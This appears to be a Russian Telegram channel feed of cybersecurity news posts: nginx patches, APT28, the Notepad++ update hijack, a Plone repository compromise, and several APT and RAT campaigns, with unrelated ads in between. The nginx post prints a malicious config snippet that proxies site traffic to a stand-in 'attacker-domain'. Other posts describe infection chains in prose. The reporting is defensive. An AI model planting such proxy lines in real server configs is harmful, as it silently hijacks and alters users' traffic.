Белый хакер Cyber Security🧑🏻‍💻

🔄 Nginx обновился, а атаки стали ещё хитрее Привет, я глянул свежие апдейты nginx и тут есть что обсудить. Вышли сразу две ветки: основная 1.29.5 и стабильная 1.28.2, и в них закрыли неприятную дыру CVE-2026-1642. Если по-простому, при проксировании по TLS атакующий с MITM мог подменять ответы от upstream и скармливать клиенту что угодно. Если у тебя nginx ходит к бэкендам по HTTPS, HTTP/2, gRPC или uWSGI, это как раз тот случай, где патчить надо без «потом».

👨‍💻 Заодно в 1.29.5 подкрутили кучу вещей, которые обычно всплывают ночью под нагрузкой. Убрали use-after-free при фейловере gRPC и HTTP/2, починили кривые запросы после переключения upstream, поправили раздувание multi-range ответов и нормально выставили HTTP_HOST для FastCGI, SCGI и uwsgi. Ничего громкого, но именно такие баги потом превращаются в инциденты.

🎁 Параллельно всплыл ещё более интересный кейс. Атакующие взламывают сервер не ради руткита, а чтобы тихо переписать конфиг nginx и начать проксировать трафик через себя. Схема простая: через старую React2Shell в серверных компонентах панелей вроде Baota правят location, подсовывают свой proxy_pass и дальше твой сайт начинает отдавать клиентам модифицированные ответы. Пример выглядит безобидно, но смысл ровно в этом. В итоге сервер чистый, файлы сайта целые, а пользователи получают инжект через прокси. Я бы сказал, это уже новый уровень «тихих» атак.

    
        proxy_set_header Host attacker-domain;
proxy_pass http://attacker-domain;{}
    

P. S Если у тебя nginx крутится под панелью хостинга и давно не обновлялся, ты в зоне риска по умолчанию. Я бы начал с апдейта и аудита конфигов, а не с логов после инцидента. #Nginx #Безопасность 👍 Белый хакер

🛡Все деньги в крипте, а тратить нужно в рублях? 🌟PGON Wallet делает всё автоматически: вы пополняете USDT, USDC или другой монетой, а система сама конвертирует в рубли и оплачивает по QR. 🌟Пополнение криптой — 0%, оплата через QR — 3%, быстрый вывод — и всё прямо в Telegram. 🐸Пополнение подарками - 0% 💸Вывод СБП - 0% 🛡Быстро, анонимно, без лишних хлопот. 🛒Теперь крипта работает на вас даже в обычных магазинах! 🌟Оцените сами: @PGON 🌟🌟🌟🌟🌟🌟

⌨️ APT28 ломает Office быстрее, чем ты успеваешь поставить патч Привет, я каждый раз офигеваю с скорости APTшек, но тут прям рекорд. Прошло всего три дня после экстренного патча Microsoft Office, а APT28 уже вовсю юзает CVE-2026-21509 в реальных атаках. Патч вышел, Microsoft сказала «ставьте срочно», а атакующие, по сути, сразу полезли в diff и начали реверсить обновление.

👨‍💻 Эксплоит они собрали буквально за сутки. Документ с вредоносом был создан уже на следующий день после релиза патча. Дальше классика: фишинг под европейские организации, открываешь документ и понеслась. Через WebDAV подтягивается цепочка, дальше COM hijacking, подменённая EhStoreShell.dll, шеллкод в PNG-картинке и запланированная задача, замаскированная под OneDriveHealth.

🔴 В финале на твою систему прилетает Covenant, знакомый фреймворк для управления зомби, который APT28 уже не раз гоняла раньше. Канал связи у них через облако Filen, а в нагрузку могут докинуть MiniDoor для воровства почты из Outlook и PixyNetLoader для полноценного удалённого доступа. География тоже понятная: Украина, Словакия, Румыния и вся Центральная и Восточная Европа, приманки на местных языках, всё аккуратно и без шума. P. S Если у тебя в почте всё ещё разрешены Office-документы с активным содержимым, ты буквально приглашаешь APT на кофе. Лучше один раз поругаться с бизнесом, чем потом разгребать инцидент. #Безопасность #APT28 #Microsoft 👍 Белый хакер

🌐 Notepad++ и подменённые обновления Всем привет! У Notepad++ всплыл инцидент с обновлениями. Часть пользователей получала подменённые exe через автоапдейтер WinGUp. Не вирус с торрента, а вполне легитимное обновление, только с сюрпризом внутри. ⬇️ Атака была не в самом коде Notepad++, а на уровне хостинг-инфры. Злоумышленники влезли между тобой и сервером обновлений и начали аккуратно подсовывать свой манифест. Проверка целостности была, но её можно было обойти. Если коротко, MITM плюс слабая валидация, и вот уже редактор предлагает скачать «обновление». 🔴 Самое неприятное, что всё это работало выборочно. Не массово, не шумно, а точечно. Провайдер подтвердил, что у них был взлом виртуального сервера, где крутился сайт проекта. Лазейку закрыли, но креды утекли, и атакующие ещё пару месяцев спокойно редиректили запросы к скрипту загрузки. В итоге Notepad++ съехал к другому хостеру и начал усиливать проверки.

👨‍💻 В 8.8.9 добавили обязательную проверку не только подписи файла, но и сертификатов, а если что-то не сходится, обновление просто не ставится. В следующем релизе обещают ещё и проверку подписи XML-манифеста. Я думаю, это правильный ход. Автоапдейты без жёсткой криптопроверки — это боль, особенно когда доверяешь инструменту годами.

P. S Отключаю автообновления у критичных тулзов и обновляюсь руками, особенно если софт живёт с правами пользователя. Это не паранойя, это гигиена. #Notepad #Безопасность 👍 Белый хакер

🎁 Хакеры проникли в репозиторий Plone и внедрили вредоносный код Привет, инциденты с компрометацией репозиториев на GitHub не редкость, но то, что случилось с Plone, — это классический пример, как злоумышленники могут использовать чьи-то ошибки для внедрения вредоносных изменений в код. Разработчики системы управления контентом Plone недавно сообщили, что в их проект был интегрирован вредоносный код, использующий JavaScript, через компрометацию учетной записи одного из разработчиков.

👨‍💻 Атака произошла, когда токен доступа разработчика был украден после того, как он запустил вредоносное ПО на своей системе. Оказалось, злоумышленники не только добавили вредоносный код в несколько репозиториев, но и использовали операцию «force push», чтобы переписать историю изменений в GitHub. Хакеры скрыли код в одном длинном коммите с использованием пробелов, чтобы затруднить его обнаружение.

👤 Хотя вредонос не попали в релиз, атака была нацелена в первую очередь на разработчиков, позволяя хакерам удаленно управлять сервером, получать данные и использовать эксплойты для повышения привилегий. Круто, что для предотвращения таких атак в будущем разработчики добавили новые правила безопасности для блокировки операции «force push» в GitHub. P. S Важно не только следить за кодом, но и быть внимательным к безопасности. Атаки через токены и подобные утечки — это не редкость. Убедись, что твоя система безопасна. #Plone #GitHub #Безопасность 👍 Белый хакер

Новичок: читает статьи и обзоры авто перед покупкой.Продвинутый: подписывается на сообщество владельцев.В JAECOO CLUB вы найдёте честные ответы от собственников кроссоверов JAECOO: от реальных затрат на содержание до отзывов о комфорте и проходимости.Плюс — получите приглашения на эксклюзивные мероприятия и общение с единомышленниками.Станьте частью клуба — переходите по ссылке!

👀 Новый игрок в киберугрозах: Punishing Owl Всем привет, вот уже новая группировка, Punishing Owl, набирает обороты. И хотя они только начали свою деятельность, уже успели напакостить немало, сделав мощное заявление о себе в соцсетях и хак-форумах. Сразу же запустили хакерскую атаку, в ходе которой они взломали российское госучреждение и выложили документы на своём сайте и в Mega. 💬 Что интересно, время для утечки было выбрано очень хитро — пятница, 18:37. Кто в безопасности будет реагировать на это в выходной день? Помимо публикации файлов, они даже переписали DNS-записи и создали поддельный TLS-сертификат, так что пользователи официального сайта попадали прямо на фишинговую страницу.

👨‍💻 На следующий день они организовали email-рассылку с вредоносными вложениями. Обычные служебные письма с фальшивыми ссылками и документами, в которых скрывался LNK-файл с PowerShell-командой, загружающей инфостилер ZipWhisper. Этот гад всё собирает из браузеров, архивирует и отправляет злоумышленникам. Даже видимость под старый домен техноблога на самом деле скрывает сервер C2.

🔔 Если ты работаешь в российской критической инфраструктуре, и тебе приходится сталкиваться с такими угрозами — не расслабляйся. Punishing Owl выглядит как серьёзный игрок, который планирует оставить свой след надолго. Их инструменты и скрытность работы говорят о долгосрочных планах, и не стоит ожидать, что они исчезнут с радаров. P. S Ставь фильтры на почту и защищай все учётки двухфакторкой. Один простой архив с LNK-файлом и вот тебе уже утечка данных. #PunishingOwl #APT #Безопасность 👍 Белый хакер

500 млн ₽ — сумма выкупа, которую в 2025 году запросили у одной российской компании Это один из десятков кейсов, разобранных в ежегодном отчёте F6 по киберугрозам в России и Беларуси. Что ещё в данных за год: — 27 APT-групп работают по целям в РФ и СНГ — 760+ млн строк данных уже опубликованы в утечках — Рост ресурсов с Android-троянами — в 6 раз на один бренд — Фишинг уступает место скаму, угону Telegram и многоэтапным схемам В отчёте — реальные сценарии атак, где компании теряют контроль, прогнозы на 2026 и практические рекомендации от экспертов F6. 👉 Получить полный отчёт по ссылке #реклама О рекламодателе

👤 HoneyMyte прокачались: шпионаж стал тише и глубже Привет, я посмотрел свежий разбор от Лаборатория Касперского, и там хорошо видно, как APT HoneyMyte за 2025–2026 годы сильно повзрослели. Ребята добавили шпионские функции в свой бэкдор CoolClient и начали активно воровать данные через браузеры и скрипты. В прицеле госсектор и бизнес в России и Азии, от Мьянмы до Таиланда. Всё выглядит как аккуратный, долгий и очень терпеливый сбор информации.

👨‍💻 Технически всё сделано без лишнего шума. Для запуска используется DLL sideloading через легитимные подписанные приложения. Я уже не раз видел этот трюк в APT атаках, и он до сих пор отлично работает. CoolClient теперь следит за буфером обмена, пишет контекст активных окон, ID процессов и таймстемпы. По сути, атакующие получают живую картину того, что ты делаешь на машине и в каких приложениях работаешь.

❕ Отдельно мне не нравится история с плагинами. ServiceMgrS.dll рулит службами, FileMgrS.dll копается в файлах, RemoteShellS.dll даёт полноценный удалённый шелл. Плюс стилеры под Chrome и Edge, скрипты для сбора документов и учёток, а данные утекают через всё подряд, от FTP до Google Drive и pixeldrain. Это уже не просто заражение, а полноценное наблюдение за пользователем внутри системы. ⬆️ Классическая защита «поставили антивирус и забыли» тут не работает. HoneyMyte играет в долгую, живёт за счёт легитимных инструментов и маскируется под обычную активность. Если у тебя нет нормального мониторинга поведения, контроля DLL sideloading и понимания, что вообще происходит на хостах, такие гости могут сидеть месяцами. P. S Следите за тем, какие легитимные бинарники грузят DLL и откуда. Это скучно, но именно там сейчас живёт половина APT. #APT #HoneyMyte #Безопасность 👍 Белый хакер

🗣 Как Amnesia RAT заходит без уязвимостей Привет, я посмотрел свежий разбор от Fortinet и, честно, это классический пример того, как сегодня ломают без всяких 0-day. Кампания нацелена на российских пользователей и начинается максимально банально. Архив с «рабочими документами», бухгалтерия, служебные задания, всё как мы любим. Внутри не просто файлы-приманки, а LNK с двойным расширением, который выглядит как обычный .txt и почти не вызывает подозрений. 👀 Дальше всё работает на психологии. Ты кликаешь ярлык, PowerShell тихо тянет первую стадию с GitHub, открывает фейковый документ и делает вид, что ничего не происходит. Пока ты смотришь на «задание», система уже стучится атакующим через Telegram Bot API. Через несколько минут подтягивается следующая стадия, всё обфусцировано, собирается прямо в памяти и почти не оставляет следов на диске.

👨‍💻 Самый неприятный момент здесь это отключение защиты без эксплойтов. Малварь чисто злоупотребляет легитимными возможностями Windows. Defender выводится из игры через исключения, PowerShell и defendnot, который регистрирует фейковый антивирус. Параллельно снимаются скриншоты, блокируются админские инструменты, подменяются ассоциации файлов. В итоге пользователь видит сообщения от злоумышленников, а система уже полностью под контролем.

🎁 Финал стандартный, но болезненный. В систему заезжает Amnesia RAT, который ворует всё подряд, от браузеров до криптокошельков, а следом шифровальщик Hakuna Matata. Вишенка на торте это WinLocker и подмена криптокошельков в буфере обмена. Я думаю, этот кейс хорошо показывает, что сегодня ломают не «через баги», а через привычки пользователей и встроенные механики ОС. И если Defender можно отключить штатными средствами, значит упор надо делать не только на патчи. P. S Если Tamper Protection у Defender выключен, считай его у тебя нет. Я видел слишком много инцидентов, где это была единственная точка отказа. #Фишинг #AmnesiaRAT #Windows 👍 Белый хакер